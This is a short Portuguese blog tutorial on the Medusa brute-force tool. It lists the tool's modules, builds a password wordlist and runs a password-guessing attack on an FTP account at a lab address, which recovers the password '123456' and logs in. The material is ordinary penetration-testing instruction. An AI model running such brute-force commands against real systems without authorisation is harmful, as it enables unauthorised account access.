InformationSecurityPro

Marcos Henrique

Information Security Pro

Medusa é uma ferramenta de brute force para a realização de ataques remotos, possui diversos módulos para realizar ataques.

Site: foofus.net

01 - Passo

Listar módulos disponíveis para ataque, neste exemplo iremos utilizar o módulo FTP.

medusa : Ferramenta.
-q : Lista os módulos disponíveis.

medusa -q | more

02 - Passo

Crie o arquivo senhas.txt contendo possíveis senhas.

cat senhas.txt

03 - Passo

Realizando o ataque, como segue abaixo a senha do usuário 100security foi revelada : 123456.

-h : Define o host alvo.
-u : Define o usuário a ser atacado.
-P : Define o arquivo Wordlist.
-M : Define o módulo.

medusa -h 10.10.10.123 -u 100security -P senhas.txt -M ftp

04 - Passo

Acesso ao ftp com o usuário 100security e senha 123456.

ftp 10.10.10.123

👍 Se este artigo te ajudou compartilhe!

Autor

Marcos Henrique

São Paulo/SP

Ataques de Senhas

GMail - Como Ativar a Prote...

Ativar a Proteção Avançada no GMail é recomenda....

WUR - WP Users Report

WP Users Report é uma ferramenta automatizada p....

Groq - Ultra velocidade em IA

Groq é uma empresa de soluções em IA que oferec....

Ollama - Guia Rápido de Ins...

Ollama é uma ferramenta de código aberto que pe....

Contato